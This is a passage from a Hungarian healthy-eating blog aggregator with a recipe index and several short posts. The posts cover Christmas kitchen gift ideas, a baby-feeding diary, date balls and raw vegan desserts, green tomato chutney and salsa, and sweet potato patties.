halat, tojást, azaz alapvetően laktovegetáriánus receptek, de sok van köztük ami laktózmentes, gluténmentes ételek. Nézelődj kedvedre:) Édes sütemények, kekszek Citromos vaníliás keksz Reform csokis keksz Egyszerű kókuszos zabpelyhes keksz Karácsonyi keksz teljes kiőrlésű liszttel Házi készítésű cukormentes csokoládé Teljes kiőrlésű tönkölykeksz naranccsal és mandulával Narancsos mazsolás keksz Gluténmentes, laktózmentes, cukormentes vaníliás keksz Zablisztes almás-diós muffin Gluténmentes, tejmentes, cukormentes köles desszert Házi készítésű mogyorós csokoládé Egyszerű, sült túrótorta Kókuszos, kakaós tönkölysütemény Reform almás szamósza Tejmentes sütőtökös muffin Gluténmentes muffin Teljes kiőrlésű, tojásmentes linzer Reform almás pite tönkölybúzaliszttel Tejmentes, tojásmentes mandulás muffin Gluténmentes, cukormentes, tejmentes meggyes muffin Shortbread keksz - reform változat Bögrés mákos sütemény Gluténmentes bögrés süti Sós vendégvárók Egyszerű sós stangli Élesztőmentes, gyors túrós vendégváró Gyors, élesztőmentes tejfölös pogácsa Gluténmentes sós muffin Cukkinis, pirított napraforgómagos minikifli Gyors hummuszkrém Élesztőmentes cukkinis pogácsa Ebéd vagy vacsora ételek Indiai Dhal - mungbab leves Quinoa, brokkolis zöldségekkel Sült padlizsános, sült házi sajtos főétel Káposztás subji - ízletes fűszeres káposztás étel Vegyes zöldséges subji - zöldséges főétel Cukkini-burgonya curry Hummusz Sütőtökös subji Zöldséges, csicseriborsós kuszkusz Kitri (kichari) Vöröslencsés, zöldséges lasagne Gluténmentes zöldségfasírt Polenta krémesen, párolt zöldségekkel Gluténmentes zöldséges lepény Zöldséges polenta pizza Fűszeres vöröslencse dhal, aszalt paradicsomos, sajtkrémes muffinnal Sütőben sült köles kása Sütőben sült fűszeres karfiol Céklás zöldségek hajdinával Gyors, egyszerű csicseriborsós curry Zöldséges pizza Pudla, gluténmentes indiai lepény Baszmati rizs zöldségekkel, korianderrel Feketemustármagos zöldbab paradicsomszószban Fűszeres sült, sütőtök Édesköményes lepény Mindenféle finomságok Chapati - indiai lepénykenyér Gyömbér tea Alma csatni Szilva csatni (sós, édes,csípő finomság) Quacamole Uborka raita Reggeli mandulaturmix Datolyás tejturmix Krémes zabkása dióval és mazsolával Pirított, párolt gyümölcsök - ájurvédikus reggeli Házi joghurt készítése Gyors, élesztőmentes kenyér Jó étvágyat kívánok:) szeretettel: Kati
Mézeskalács fűszerkeverék házilag
Avagy minek vennénk készen, ha magunk is megcsinálhatjuk… A mézeskalács fűszerkeverék csupa-csupa melegítő hatású fűszerből áll. Azonkívül, hogy a hagyományos karácsonyi édességek ízesítője, készíthetünk belőle teát, ízesíthetünk vele tejes édességeket vagy akár almakompótot is. Nagyszerű...
Gasztro ajándék ajánló (karácsonyra)
2016. december 1. Zizi kalandjai
Összegyűjtöttem néhány ajándék ötletet, ha éppen gondolkoznátok, hogy mit kérjetek a Jézuskától vagy éppen ajándékot kerestek gasztronómia iránt érdeklődő barátnak, rokonnak, testvérnek… vagy csak egyszerűen konyhában használatos újdonsággal szeretnétek meglepni szeretteiteket karácsonyra vagy bármikorra! Az egészen olcsótól a drágáig terjednek a kiválasztott termékek, összesen 21 darab, de sokkal többet ki tudtam volna választani. Jó néhány terméket saját magam is használok, így pozitív tapasztalatokkal rendelkezve ajánlom, de vannak köztük olyan termékek, amelyekre jómagam (is) vágyom!
Ezt a bejegyzést egyik cég sem szponzorálja (de kár! ), saját válogatásom eredményeképpen kerültek a kiválasztott termékek a listára!
1. Kék bambusz tálka (többféle színben kapható)
Környezetbarát anyag, letisztul design. Jól esik belőle enni a kókuszjoghurtba kevert granolát.
2. Porcelán kék mintás bögre (többféle színben kapható, éppen akciós!)
Bögréből sosem elég, mindig kell egy újabb, esetleg egy hat darabos kollekció!
3. Chemex kávéfőző/kávékészítő
Manapság a kávézás a fénykorát éli. A Chemex-et egy német vegyészmérnök, Peter J. Schlumbohm találta fel 1941-ben. A kávékészítőt azóta elismert amerikai design termékként is jegyzik. A kávézás szerelmeseinek kötelező.
4. Öntöttvas tűzálló edény fedővel
A hőt egyenletesen eloszlató öntöttvasból készült. A fedél belsején összegyűlik a pára, és lecsepeg a fogantyúknál, ennek köszönhetően az ételre folyamatosan kerül folyadék, így az nedvdús és ízletes lesz. 25 év garancia van rá! Régóta vágyom egy öntöttvas edény családra!
5. Kyocera kerámia hámozó (többféle színben)
Ahogyan említettem korábban, anyukám szerint és szerintem is a legjobb hámozó a piacon. Vékonyan hámoz, a borotvaéles kerámia pengének köszönhetően még a paradicsomot is meg tudjuk hámozni vele. A fej követi a zöldség, vagy gyümölcs felületét, így könnyedén, és pazarlásmentesen lehet vele a hámozást elvégezni.
6. Fokhagymaprés
Sokszor aprítok fokhagymát késsel, de ha Ádi is segíteni szeretne nekem, akkor inkább a fokhagymaprést használjuk. Többet kipróbáltam már, nekem ez vált be a legjobban!
7. Kerek fatálca
Csodás sötétbarna tálca, 32 cm átmérőjű, alján gumilábakkal.
8. és 9. Színes gyerekkötények (többféle színben)
Mókássá tehetjük a közös főzést ilyen vidám kötények segítségével. A tépőzáras rögzítés könnyen kioldódik, így a gyerekek is egyszerűen le tudják venni. 3 éves kortól ajánlott.
10. Üveg ételtároló (többféle méretben)
Egy ideje elkezdtem lecserélni a műanyag ételtárolóimat. Igen, tudom, az üveg törékeny és nehezebb, viszont nem marad meg benne úgy az ételszag és nem színezi be az étel úgy, mint a műanyagot. A tároló sütőbiztos üvegből készült, így sütőben és tálalóedényként is használható.
11. Kyocera kerámia szeletelő kés, 11 cm (többféle színben)
Mindig szerettem volna egy kiváló kést, ami éles, strapabíró és igazi társ a konyhában. A fehér penge először furának tűnhet, de én már nagyon megszoktam. Vidám színekben (kés nyele) kapható.
12. Konyharuha (többféle színben)
Vidám két darabos konyharuha szett, 100% pamut anyagból.
13. BeCake tortatál (többféle színben)
Mindegyik tál egyedi, kézzel készített darab. Gondosan válogatott, minőségi fából esztergált, és természetes alapanyagú festékkel festett. Nem hiányozhat a készletünkből egy csodaszép tortatál… nálam már kettő használatban van!
14. Philips robotgép
Évek óta “gyűröm” a Philips konyhai robotgépemet. 1300 wattos teljesítményének köszönhetően könnyen készíthetünk vele magvajakat, datolyagolyókat, nyers tortákat. Nagyon sok tartozéka van, nálunk leggyakrabban az apítógép, a turmixgép és a zöldség-gyümölcscentrifua dolgozik.
15. Ananászos konyharuha
Nagyon szeretem a csillogó, metál színeket és az ananász motívumot, ami manapság nagy népszerűségnek örvend. Tuti nyerő ez a biopamut szöveg anyagból készült konyharuha.
16. Microplane reszelő (többféle színben)
Senkinek a konyhájából nem hiányozhat egy Microplane reszelő, ugyanis ez új távlatokat nyit a reszelés világában (citrusok héjának reszelése, szerecsendió reszelése, stb.)! Tartós, ultraéles, rozsdamentes acél, szabadalmaztatott rács szerkezetű pengék – amerikai gyártmány, gumi végek.
17. Kyocera kerámia reszelő (többféle méretben)
100% kerámiából készült. Alkalmas fokhagyma, gyömbér, és egyéb zöldségek, gyümölcsök feldolgozására, baba ételek készítéséhez alma, körte, őszibarack, stb. reszeléséhez. Szilikon aljzattal rendelkezik, amely meggátolja az eszköz használat közbeni elcsúszását, így egy kézzel is használhatjuk (míg a másik karunkban tartjuk a gyereket ). Tényleg villámgyorsan pépesre tudunk vele reszelni egy almát!
18. Kötény
Vidám zöldség mintás kötény, 100% pamut anyagból.
19. Sütipecsét
Pecsétnyomó házi készítésű kekszek feliratozásához Home made (házi készítésű) felirattal.
20. Öntöttvas serpenyő
Nagyon régóta vágyom egy igazi öntöttvas serpenyőre… talán most karácsonykor valóra válik a kívánságom! A hőt egyenletesen eloszlató öntöttvasból készült, így hosszú időn át meleg marad az edény, és egyenletes pirulást biztosít. Minden főzőlapon jól használható, beleértve az indukciós főzőlapot is. 25 év garancia van rá!
21. Üveg bögre szívószállal, fém tetővel
Szuper jó belőle inni a reggeli vagy délután turmixunkat. Tetejének köszönhetően praktikus, a gyerekek sem öntik ki belőle az italt.
Tudatos felkészülés a karácsonyra - 4. rész Az ajándékok
2016. november 28. Élj harmóniában
Ne engedd, hogy a karácsonyi készülődés feleméssze minden energiádat és pénzedet A cikksorozat előző részben arról írtam, hogy olyan ajándékot válassz, amire valóban szükség van. A mai bejegyzéssel csokorba gyűjtöttem néhány konkrét javaslatot. Az ajándékozásnál az egyik legjobb, ha élményt ajándékozol - utazás, színházjegy, jóga tanfolyam, masszázs, etc. . Számos kutatás alátámasztotta már, hogy az élmények sokkal több pozitív érzettel szolgálnak, mint a tárgyak. Ráadásul az élmények, olyan lenyomatokat hagynak az emberben, amelyek sok évvel később felidézve is örömet okoznak. Amennyiben az élmények helyett jobbnak tartod a tárgyak, termékek vásárlását vagy készítését próbálj olyan terméket adni, ami nem terheli nagyon a környezetet és akinek adod, annak az egészségére nem káros. Néhány egészséges ajándékötlet: - Saját készítésű finomság: mézben eltett magvak, aszalt gyümölcsök, reformkeksz, lekvár, szörp, csokoládé, bon-bon, szaloncukor - Bio élelmiszerek: tészta, teljes kiőrlésű liszt, nyers nádcukor, friss gyümölcsök, zöldségek, baszmati rizs, ghí,különleges gabonák, hüvelyesek, minőségi bio olajok Amennyiben alap élelmiszereket vásárolsz bio változatban, az nem lesz felesleges és aki elfogyasztja annak sokat teszel az egészségéért is. - Bio édességek: aszalt gyümölcsök, magvak, csokoládé, bon-bon, marcipán, gyümölcslé, müzliszelet , nápolyi Mindenki szeret nassolni, valami finomságot csipegetni. Ha valami édes meglepetést szeretnél itt válassz egészségesebb változatokat. - Természetes alapú, adalék mentes teák: gyümölcstea, fűszeres tea, zöld tea, gyógytea Készíthetsz saját kézzel szedett tiszta minőségű gyógynövényekből is teakeveréket - Vegyszermentes,bio kozmetikumok: szappan, arckrém, tusfürdő, testápoló, testolaj, hajsampon, smink kozmetikumok Kozmetikumokat is tudsz akár házilag készíteni tiszta minőségű, bio alapanyagokból. Az interneten számos receptet találhatsz. - Könyv: egészséges életmóddal kapcsolatos könyv vagy egészséges recepteket tartalmazó szakácskönyv Készíthetsz kis könyvet Te magad is az általad hasznosnak, inspirálónak gondolt cikkekből, receptekből. - Kikapcsolódás: wellness pihenés, utazás, szauna bérlet, masszázs utalvány, jóga tanfolyam, fitnesz bérlet, uszoda bérlet Sok kreativitást és szeretetet kívánok az ajándék kiválasztáshoz:) szeretettel: Kati
Kókuszos mandulagolyók (több változatban)
2016. november 21. Gitta nyersétel blogja
A kókuszos mandulatej készítésénél visszamaradó pépet sokféleképpen fel lehet használni. Az egyik, talán legegyszerűbb módja a Raffaelló golyó készítése. Mandulás-kakaós kókuszgolyóAz alapanyagunk morzsolódó, kicsit száraz, emiatt kókuszolajat vagy kókuszkrémet kell hozzátenni, a másik összetevő az édesítést szolgálja, agave szirup, vagy méz (ahogy tetszik), de mindenképpen valamilyen folyékony édesítőszer legyen, ugyanis itt nagyon fontos a "ragasztás", amit egy kristályos, száraz édesítőszer nem tud produkálni. A datolyát is nagyon szeretjük, csak itt most a színe miatt nem jöhet szóba. (maradjon csak szép fehér az a golyó) Raffaello golyó (no meg nem Raffaello, ami hátrébb van, csokis) Hozzávalók: 15 dkg kókusz-mandula pép (ami a tej készítésénél visszamarad) 1-2 evőkanál kókuszolaj (enélkül túl száraz lenne a massza) 2 evőkanál folyékony édesítőszer (valamilyen szirup vagy méz) kókuszreszelék egy mokkáskanál fahéj egy-egy szem mandula a golyók közepébe (vagy kakaópor, ha többféle golyót készítünk...) Szép sorban... A magpépet, kókuszolajat, és az édesítőszert jól összedolgozzuk. Fahéjjal ízesíthetjük. Kis golyókat formázunk, a közepére rakhatunk egy-egy szem mandulát. A golyók első harmadát meghempergetjük a kókuszreszelékben. A golyók második harmadát kakaóporba forgatjuk. A megmaradt kakaóport a maradék masszához adjuk, és a kakaós kókuszgolyókat ismét kókuszreszelékbe forgatjuk.
Táplálj helyesen édesanyám! (6. rész)
2016. november 21. Zizi kalandjai
Kerámia reszelő {Kyocera}, bambusz kanalak {Mamamibolt}
Minden ember más és más. Minden gyerek más és más. Minden baba más és más. Ez itt a Táplálj helyesen édesanyám! kettő pont nullás újratervezett verziója!
Talán néhányan emlékeztek, hogy miket írtam Ádi hozzátáplálásának a kezdetén. Azóta rájöttem, hogy a leírtak alapján tankönyvszerűen haladtunk. És mi a helyzet Ákossal? Na őt más dióból faragták! Elmesélem miért!
Július elején lett 6 hónapos, de eltelt utána még egy kis idő, amikor először próbálkoztunk nála finom, szaftos, édes őszibarackkal. Nem igazán lett a kedvence, ahogyan a répa sem. Azt gondolom, magával az “ízorgiákkal” volt baja, nem kattant rá a szilárd ételre, ahogyan Ádi, így tartottunk nála egy kis szünetet. Azért persze néha-néha próbálkoztunk újra őszibarackkal, almával és répával, de csak próbaszerűen. 8 hónapos kora körül kezdett el kicsit jobban érdeklődni az ételek iránt, de nem olyan lelkesedéssel, mint Ádi, hanem ímmel-ámmal, néha ízlett neki egy-két dolog és egész jól evett belőle.
Az az igazság, hogy másodjára már nem vagyok annyira lelkes a hozzátáplálást illetően, mint első alkalommal. Két gyerek ellátása és a háztartás vezetése mellett, valamint a saját ebédünk megfőzése mellett kevés időm marad Ákos ételeinek elkészítésére. Igyekszem minél könnyebben és egyszerűbben megoldani a dolgot, ráadásul sokszor fektetek bele több energiát, hogy hátha most majd megeszi, amit főzök, aztán mégse teszi. Szóval lazábban kezelem a dolgot és többnyire nyers vagy sült zöldségeket és gyümölcsöket adunk neki. A nyers gyümölcsök többségét – körtét, almát – Kyocera kerámia reszelővel reszeljük pépesre. Hihetetlen könnyű reszelni ezzel a 100% kerámia reszelővel, ugyanis szilikon aljzattal rendelkezik, mely meggátolja az eszköz használat közbeni elcsúszását. Simán tartod az egyik karodban a gyereket, a másik kezeddel pedig tudod reszelni a hámozott almát, ráadásul villámgyorsan, mert a kerámia anyagnak köszönhetően nagyon gyorsan le lehet reszelni vele egy teljes almát vagy körtét. Nem csak baba hozzátápláláshoz hasznos az eszköz, mert lehet vele reszelni fokhagymát, gyömbért, kurkumát, őszibarackot, puhább zöldségeket, például cukkinit is (kiváló ajándék lehet karácsonyra a szuper éles hámozóval együtt – anyukám szerint a világ legjobb hámozója, ő már elég sok fajtát kipróbált, de szerinte ez a legjobb ).
Lazábban veszem azt is, hogy miket adok neki, szóval ő sokkal hamarabb kóstolta az avokádót és a banánt például, mint Ádi. Mennyiségeket egyáltalán nem mérek nála, teljesen felesleges, mert randomszerűen eszik. Hol egy egész kis tálkával megeszik például egy almás kását, hol egy kanálnyi után nemtetszését fejezi ki, tehát értelmetlen lenne mennyiségeket mérni és azokat tukmálni rá. Zöldségeken és gyümölcsökön kívül gluténmentes gabonakását csinálunk még neki kb. 8-9 hónapos korától. Ezt is néha megeszi, néha nem. Gluténmentes tésztát is eszik, a Biorganiktól veszem ezt a kis kagyló formájút, ami azért jó, mert a pici kis ujjaival könnyen tudja csipegetni a tészta darabkákat.
Brokkolis tészta (főtt gluténmentes tészta párolt brokkolival)
Abban is lazább vagyok, hogy sokkal hamarabb adtam neki darabos, darabkás ételeket. Pürével kezdtünk, de néha úgy éreztem, hogy a darabos étel jobban menne neki. Nem mondom, hogy BLW-zünk – és tudom BLW (baby led weaning) során tilos keverni a pürés ételeket a darabossal -, inkább azt mondom, hogy hamarabb kezdte a darabos ételek fogyasztását, mint Ádi. Most már 10.5 hónapos, van már 5 foga és még legalább 5-6 jön neki éppen, tehát egész jól tud már “rágcsálni”. Valószínűleg a sok fog érkezése miatt viszont most alig eszik valamit, hébe-hóba kóstolgat meg ételeket… bármit teszek elé, adok neki, többnyire nem érdekli. A cici viszont annál inkább. Ez a fogzási időszak velejárója lehet, hogy nincs a babának étvágya. Na de Ákos súlya miatt nem kell aggódni, mert már 9.5 hónapos korában 11 kg volt!
Ádinak nem jöttek rohamtempóban a fogai, észre sem vettük, hogy fogzik, tehát nála étvágytalanság fel sem merült. Ákosnál viszont éppen turbó időszak van, így szegénykém nyugtalan is, meg a szilárd étel sem érdekli igazán.
Szóval ezeket ette, próbálta eddig (10.5 hónapos éppen):
Gyümölcsök: őszibarack, sárgabarack, alma, körte, szőlő, mangó, banán, avokádó.
Zöldségek: cukkini, kaliforniai paprika, répa, paszternák, sütőtök, spenót, brokkoli, karfiol, édesburgonya, lilaburgonya, burgonya, uborka, fokhagyma.
Gabona: gluténmentes gabonapehely, gluténmentes tészta.
Zsiradék: hidegen sajtolt babaolaj (repce-, napraforgó-, kenderolaj), minimális kókuszzsír.
Folyadék: anyatej, víz.
Zöldfűszer: kakukkfű, petrezselyem.
A tuti nyerő étel nála az avokádó. Általában ezt mindig megeszi. Vagy csak simán a héjából kikanalazzuk a gyümölcs húsát és falatkákat adunk, vagy villával pépesre törjük és úgy adjuk neki. Általában képes megenni egy fél avokádót vagy egy kicsivel többet egy étkezés során. Egyszer főztem fokhagymás párolt spenótot, amit gabonakásával kevertem össze. Meglepő módon az egészet megette. Teljesen kiszámíthatatlan, hogy mit eszik meg és mikor. Reménykedünk, hogy a fogai minél előbb kibújnak, a fájdalom elmúlik és megjön az állandó étvágya minél előbb.
Táplálj helyesen édesanyám! (1. rész)
Táplálj helyesen édesanyám! (2. rész)
Táplálj helyesen édesanyám! (3. rész)
Táplálj helyesen édesanyám! (4. rész)
Táplálj helyesen édesanyám! (5. rész)
Változatos datolyagolyók egyszerűen, akár az ünnepi asztalra is (gluténmentes, laktózmentes, tojásmentes, nyers vegán)
2016. november 15. Zöld Avocado
datolyagolyók (gluténmentes, nyers vegán) A datolya az egyik legősibb gyümölcsünk, mely a Bibliában is fel-felbukkan, és feltehetően már az időszámításunk előtti Mezopotámiában is ismerték és fogyasztották. A datolya az araboknál az őszinteséget, a szépséget és az igazságosságot szimbolizálja. Növényi hormontartalmának köszönhetően az arab kultúrákban gyakran fogyasztják a változókor idején a nők, hogy elősegítsék a hormonháztartás egyensúlyának megtartását. Jelentős természetes kalcium és magnézium forrás, illetve rosttartalmának köszönhetően hozzájárul a tökéletesebb emésztéshez. (Székrekedés és aranyér esetén is a testünk is fellélegezhet napi 1-2 szem datolya fogyasztása után.) Jelentős természetes cukortartalmától gyorsan kapunk új energiára pár szem datolya golyó elfogyasztása után. Főleg, ha a golyókba még ún. szuperételeket is elrejtünk. Népszerű és egyszerű desszert következik, ahol az alap hozzávalók egyformák, az ,,extra hozzávalókkal a végeredmény mégis változatos. Nem kell őket sütni, rengeteg fajta alapanyagból elkészíthetjük, és kb. 15 perc munkát igényelnek. Mutatok nektek 7 különböző ízű datolyagolyó ötletet, melyek csak kiindulási alapok. A variációk száma végtelen! Kísérletezzetek bátran, mert elrontani nem lehet! Melyik recepttel kezditek? HOZZÁVALÓK (fajtánként 15 darab kb. 3 cm átmérőjű golyóhoz) datolyagolyók (nyers vegán)1) narancsos - diós: - 100 g áztatott datolya - 1/2 narancs frissen facsart leve - 2/3 bögre dió ledarálva - meghempergetni reszelt narancshéjban 2) pisztáciás - lime-os: - 100 g áztatott datolya - 60 g apróra tört pisztácia - 50 g darált mandula - 1/2 zöld lime leve és a reszelt héja - 2 ek bio kakaópor / karobpor - megforgatni darált pisztáciába, és reszelt lime héjban Megjegyzés: A datolya mennyisége az áztatott datolyára vonatkozik. (A datolya helyett használhatunk aszalt szilvát is.) 3) chiás - vörösáfonyás 4) mákos - citromos 5) pekándiós - répás 6) almás - diós 7) kókuszos - karobos datolyagolyók (gluténmentes, nyers vegán) datolyagolyók (nyers vegán)ELKÉSZÍTÉS 1) Áztassuk be a mag nélküli datolyát min. 3-4 órára, majd az áztató víz nélkül tegyük az aprítógépbe (Botmixer is jó. Sőt! Ha elég puhára ázott a datolya, akár a kezünkkel szétnyomkodva is pépesíthetjük.) 2) A ,,lekvárrá zúzott datolyát tegyük egy keverő tálba a többi hozzávalóval, majd kézzel gyúrjuk alaposan össze. (Ha túl nedves az alapanyag - függ a felhasznált datolyától - , tegyünk hozzá 1/2 evőkanál útifű maghéjat vagy chia magot vagy még több darált mandulát, hogy keményebb tésztát kapjunk. Ebben az esetben hagyjuk állni a nyers tésztát golyózás előtt, hogy magába tudja szívni a nedvességet az útifű maghéj vagy a chia mag.) 3) Formázzunk golyókat, majd hempergessük meg őket a választott ízesítésnek megfelelő hozzávalóban. 4) Fogyasztás előtt tegyük őket a hűtőbe min. 2-3 órára. datolyagolyók (gluténmentes, nyers vegán) Kíváncsi vagy a többi datolya golyó receptre? Szeretnél még több természetes alapanyagot, zöldséget, gyümölcsöt, magvakat, diófélét fogyasztani, de nincs ötleted, hogyan készítsd el őket? Jön a Karácsony. Érkezik a gluténérzékeny, laktózérzékeny, cukorbeteg vendégsereg. Manapság egyre nagyobb kihívás a különböző diétát követő vendégek igényeit kielégíteni! Szeretnéd, ha mindenki jóllakottan, elégedetten és lenyűgözve hagyná el az otthonod? A Mit eszik a Világ? Ha nem eszik... c. recepteskönyv már Magyarországon is kapható! 170 db egészséges recept, magyar szerzőtől, nyomtatott és elektronikus formában is. Az e-Könyv höz már 1 995 Ft -tól hozzájuthatsz! Kíváncsi vagy rá mit mondanak róla korábbi vásárlóink? Katt a "Ti küldtétek" menüpontra! Szeretnél belelapozni a könyvbe? Itt megteheted: Mit eszik a Világ? Táplálkozz, ne csak étkezz! ;-) datolyagolyók (gluténmentes, nyers vegán) datolyagolyók (gluténmentes, nyers vegán) datolyagolyók (gluténmentes, nyers vegán) datolyagolyók (gluténmentes, nyers vegán)
Fried Green Tomatoes
Ugye a paradicsomok, paprikák normál esetben nyáron teremnek? De mi van a későn érőkkel, az érlelő napfényről lemaradottakról, a párás ködös reggeleket megélőkről, a beteljesületlenség érzésétől telítődöttekkel? Már ha a paradicsomok éreznek, de miért is ne tennék? Feladatunk, hogy segítsük őket hátrányos helyzetükben is eljutni tányérunkra, ahogy lett származású barátnőm mondaná: ,, Csináljunk defektből effektet! . Ehhez hoztam néhány ötletet: csatni, salsa verde és sült zöld paradicsom formájában. Jó tudni: A zöld paradicsom a nyers burgonyához hasonlóan tartalmaz szolanint -az érés során ez lebomlik- ezért fogyasztása nem teljesen veszélytelen, de ehhez a veszélyhez kilószám kellene fogyasztani az egyik legfinomabb savanyúságból, amit friss íze kifejezetten egzotikussá tesz a hazai zöldség és gyümölcs kínálatban. Zöld paradicsom csatni: A zöld paradicsom citrusos, citromhéjra emlékeztető íze miatt jól illik halakhoz, grillezett kecske sajthoz és zöldségekhez. Hozzávalók: 1 kg zöld paradicsom 2 dl víz csillagánizs, szegfűbors, szegfűszeg 2 db citrom leve 20 dkg cukor ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- 1 kg zöld paradicsomot - nem szükséges hámozni, magozni- feldarabolom. Egy lábasban felforraltam 2 dl vizet és 20 dkg cukrot, hozzáadtam egy csillagánizst, néhány szem szegfűborsot és szegfűszeget és két citrom levét. A szirupot felére beforraltam, beletettem a feldarabolt paradicsomot. Addig főztem takarék lángon, amíg elfőtt a leve és besűrűsödött. 4 deciliteres üvegbe töltöttem, majd dunsztba tettem, így télre is spájzolhatunk belőle. Sült zöld paradicsom ( rántott zöld paradicsom ): Az egy centi vastagra szeletelt, sózva pihentetett paradicsomokat egyszerűen ki is lehet rántani, de álljon itt a recept a vele azonos című könyvből: "Hozzávalók: személyenként egy közepes zöld paradicsom, bors, fehér kukoricaliszt, szalonnazsír, só. A paradicsomot szeld fel körülbelül 1/4-es hüvelykes szeletekre. Ízesítsd sóval, borssal. Panírozd be a szeletek mindkét oldalát kukoricaliszttel. Végül forró szalonnazsírral kikent serpenyőben süsd világosbarnára. Azt hiszed, hogy meghaltál és a mennyországba kerültél! Plussz: sült zöld paradicsom tejes mártásban: a serpenyőben maradt minden evőkanál szalonnazsírhoz keverj egy evőkanál lisztet, és jól keverd el. Aztán habarj bele egy csésze meleg tejet, és állandó keverés mellett főzd sűrűre. Tetszés szerint ízesítsd sóval és borssal, végül a szószt öntsd a paradicsomszeletekre. Forrón tálald. Nincs a világon ennél finomabb. " / Fannie Flagg : Sült zöld paradicsom / Salsa verde zöld paradicsomból: A zöld paradicsomból készített salsa verde a legjobb, amit valaha ettem. Színe és íze tökéletes harmóniában van. Hozzávalók: ? 4 db zöldparadicsomot ? 1 db közepes méretű édes hagyma ? egy gerezd fokhagymát ? 1 db zöld erős paprika kimagozva ? 1/2 csokor petrezselyemzöld ( opcionálisan koriander zöld ) ? egy csipet koriandermag frissen őrölve ? 1 ek.olívaolaj ? negyed citrom leve és egy citrom(bio) reszelt héja ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- A zöldparadicsomot és a salátahagymát felkarikáztam és besóztam és állni hagytam. Ezek után a többi hozzávalóval robotgépbe tettem és jól összeturmixoltam, a reszelt citromhéjat pedig utólag kevertem bele. Nyári ízélmény az őszben.
Tejberizs illatos karamellben párolt körtével
A körtét igazi, európai őshonos növénynek is tekintik, mivel valóban emberemlékezet óta velünk van az öreg kontinensen. Találkozni vele római receptkönyvekben, és ógörög nevén emlegeti napjainkban a világ legnagyobb része. Érdekesség, hogy mi mégis a török szót vettük át: kertme, azaz körte.
A gyümölcsnek kb. 3000 faja létezik, amik mind ízben, mind küllemben igen változatosak. Vannak sárga, zöld és piros körték, csepp alakúak, szögletesek, sőt, teljesen kerek formájúak is. A majd 20 cm-es, különleges nemesítésű óriások mellett eltörpül az ősi 1-2 centiméteres vadkörte. (Vajon mennyit kellett abból Süsünek megennie, hogy jóllakjon?)
Az egyes fajták júniustól késő őszig érnek. A sort a lédús, puha körték kezdik, és a keményebb, téli fajták zárják. Így találkozni évről évre először az Árpával érővel, majd a Vilmos és Császár körtével, most ősszel pedig az Alexander körtével.
A körtének számos gyógyhatása ismert, ezek közül is kiemelkednek a gyulladáscsökkentő tulajdonságok. Ajánlott a körtekúra vagy körtelé-kúra az emésztőrendszer hurutos megbetegedéseire, de a természetgyógyászat javasolja még reumára, köszvényre, ízületi fájdalmakra, sőt, köhögésre is.
A gyümölcs persze nyersen a legjobb, de érdemes belopni az ételekbe, igazán különleges lesz a végeredmény. Ennek fényében fogadjátok két körtés receptemet, egy ilyet és egy olyat. :) Mindkettőt átvette a 108 Magazin 65. száma is.
Tejberizs illatos karamellben párolt körtével
Hozzávalók 2-3 adaghoz
[...] Bővebben!
Túrógombóc kölessel
Hozzávalók: 10 dkg köles egy csipet só 2 dkg vaj 1 kk vaníliakivonat fél citrom héja reszelve a használt édesítőszer ízlés szerint (nádcukor, nyírfacukor, stb.) 30 dkg túró 6-8 dkg darált dió A tetejére édes tejföl, fahéj (opcionális) A kölest megmossuk, megszórjuk egy csipet sóval, és háromszoros...
Zöldhagymás édesburgonya-pogácsa
2016. november 9. Vegán muflon
Vannak konyhai fogalmak, melyek szitokszóként is kiválóan funkcionálnak. Ilyen a pogácsa, a piskóta, a nokedli és a pampuskajanicsár, jóllehet, ez utóbbit még soha, senki nem ejtette ki a száján. A szerző kivételesen nem gyalázkodásként gondolt a pogácsára, és higgadt lelkiállapotában végiggondolta, hogyan lehetne elkészíteni a sima krumplis verzió változatát progresszívebb formában, egy tankhajónyi étolaj nélkül. Javasolnám, hogy csupán azok kíséreljék meg az előállítását, akik rendelkeznek némi rutinnal pl. zöldségfasírt-gyártás terén, ellenkező esetben könnyen előfordulhat, hogy a legkülönfélébb mitológiai vadakat szólítják fel szexuális aktusra nagy hangerőn. (Önéletrajzi ihletésű tanulság!)
Beszerzi célirányosan a következőket:
1 kg édesburgonya 2-3 szál felaprított zöldhagyma 2 ek szójaszósz 100g liszt 1/2 tk barnacukor 1 ek felaprított chilipaprika 1 tk só olívaolaj vagy kókuszzsír a sütési metódushoz
Az édesburgonyát hirtelen felindulásból meghámozzuk, majd szándékosan puhára pároljuk. Szükség esetén szűrőbe tesszük, és mikor lecsepegett, majd kihűlt, egy keverőtálba helyezzük, és összegyúrjuk a többi hozzávalóval. Ha túlságosan mrutyok állagúnak találjuk, további lisztet adunk hozzá. Ezt követően egy szigorúan tapadásmentes serpenyőben olívaolajat hevítünk, majd kisütjük rajta a pogácsává formázott masszát. Korianderes-szójajoghurtos mártással fogyaszthatjuk, de magában megzabálva is isteni.
Nyers könnyű csokitorta
2016. november 7. Gitta nyersétel blogja
A novemberi nyersétel hétvégén készítettük el ezt a gyönyörű nyers csokitortát, ami azért különleges, mert habkönnyű, nem túl édes, finom, krémes... Havi rendszerességgel tartunk nyersétel hétvégéket Piliscsabán, ahol péntektől vasárnapig együtt vagyunk, nyers ételeket készítünk, eszünk... és minden hétvégén viszek valami különleges programot, most a novemberi hétvége témája a germán medicína volt, Deák Csaba tartott előadást és vele tisztáztuk a kérdéseinket is (volt sok). De jöjjön a lényeg, a csokitorta receptje a18 cm-es tortaformához Hozzávalók: az alaphoz: 10 dkg kókuszreszelék 5 dkg zabpehely 5 dkg datolya (beáztatva) 1 csipet só a krémhez: 20 dkg kesudió, és annyi víz, amennyi épp ellepi 40 dkg datolya (beáztatva mérve) 1 teáskanál vanília őrlemény 1 teáskanál agar agar 1 dl víz 2 evőkanál kakaópor az öntet: 20 dkg bármilyen piros bogyós gyümölcs 1 banán Sütőpapírral kibélelünk egy kis tortaformát (kb 18 cm-es). A zabpelyhet aprítógépben megtörjük (nem kell teljesen lisztté őrölni), és összekeverjük a kókuszreszelékkel és a sóval. A beáztatott datolyából annyit gyúrunk hozzá, hogy egy nem túl nedves, de formázható masszát kapjunk. Ez kb 5 dkg, de attól is függ, hogy mennyire nyomkodtuk ki belőle a vizet. Ezt a masszát belenyomkodjuk az előkészített tortaformába, kanál hátuljával jól kisimítjuk szép egyenesre. A csokikrémhez a kesudiót simára turmixoljuk annyi vízzel, amennyi a turmixgépben szükséges ahhoz, hogy egy teljesen sima krémet kapjunk. Hozzátesszük a datolyát, vaníliát és a kakaóport 